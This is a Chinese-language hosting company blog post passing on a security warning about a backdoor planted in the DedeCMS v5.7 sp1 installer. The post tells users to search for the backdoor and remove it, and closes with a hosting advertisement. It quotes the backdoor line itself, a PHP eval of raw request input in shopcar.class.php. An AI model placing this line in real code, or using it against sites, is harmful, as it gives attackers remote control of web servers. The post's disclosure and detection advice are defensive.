無(wú)憂主機(jī)（www.gle-technology.com）今天在閱讀業(yè)內(nèi)新聞，看到一則最新關(guān)于dedecms內(nèi)容管理系統(tǒng)被植入后門的代碼，非常危險(xiǎn)，這個(gè)后臺(tái)將有可能泄漏網(wǎng)站資料或被控制對(duì)外攻擊，對(duì)用戶網(wǎng)站威脅巨大。詳細(xì)信息如下： 3月22 日消息，瑞星與 360 今日對(duì)外發(fā)布警示，稱國(guó)內(nèi)知名的 PHP 開源網(wǎng)站管理系統(tǒng)織夢(mèng) CMS（DedeCms）v5.7 sp1 版本安裝包被發(fā)現(xiàn)植入后門，黑客可通過(guò)此后門直接獲得網(wǎng)站的控制權(quán)限，進(jìn)而上傳攻擊腳本，利用用戶網(wǎng)站對(duì)外發(fā)動(dòng)攻擊，并能夠控制用戶的網(wǎng)站進(jìn)而對(duì)服務(wù)器安全和穩(wěn)定造成威脅。 安全界人士分析發(fā)現(xiàn)，此次織夢(mèng)CMS 曝出的后門惡意代碼存在于購(gòu)物車類文件（shopcar.class.php）中，此類文件被植入一句后門代碼“@eval (file_get_contents('php://input'));”。凡是調(diào)用該購(gòu)物車類的文件均會(huì)觸發(fā)后門，嚴(yán)重威脅服務(wù)器的安全和穩(wěn)定，進(jìn)而控制用戶網(wǎng)站漁利或進(jìn)行其它非法行為。 無(wú)憂主機(jī)（www.gle-technology.com）在使用dedecms系統(tǒng)的用戶密切關(guān)注dedecms官方動(dòng)向，如有更新補(bǔ)丁請(qǐng)及時(shí)升級(jí)更新。無(wú)憂主機(jī)建議用戶把dedecms的站點(diǎn)源代碼下載到本地，利用文本替換器，查找搜索“@eval(file_get_contents ('php://input'));” 判斷自己的代碼中是否存在這個(gè)后門代碼，如果有請(qǐng)及時(shí)刪除。 相關(guān)鏈接： 織夢(mèng)CMS系統(tǒng)被曝植入后門70萬(wàn)網(wǎng)站資料或泄露 無(wú)憂主機(jī)（www.gle-technology.com）提醒用戶，請(qǐng)及時(shí)檢查并做好dedecms v5.7 sp1升級(jí)防御工作。凡發(fā)現(xiàn)，此漏洞給服務(wù)器帶來(lái)嚴(yán)重安全問(wèn)題的，我公司為保障服務(wù)器用戶網(wǎng)站安全為由，dedecms v5.7 sp1存在嚴(yán)重安全漏洞為由關(guān)停站點(diǎn)，直至該漏洞被修復(fù)。 純Linux環(huán)境下高端免備案［香港獨(dú)立IP地址］ php空間，僅僅只需199元一年起。商務(wù)中國(guó)域名核心代理直銷50元注冊(cè)國(guó)際頂級(jí)域名

本文地址：http://www.gle-technology.com/dedecms/5411.html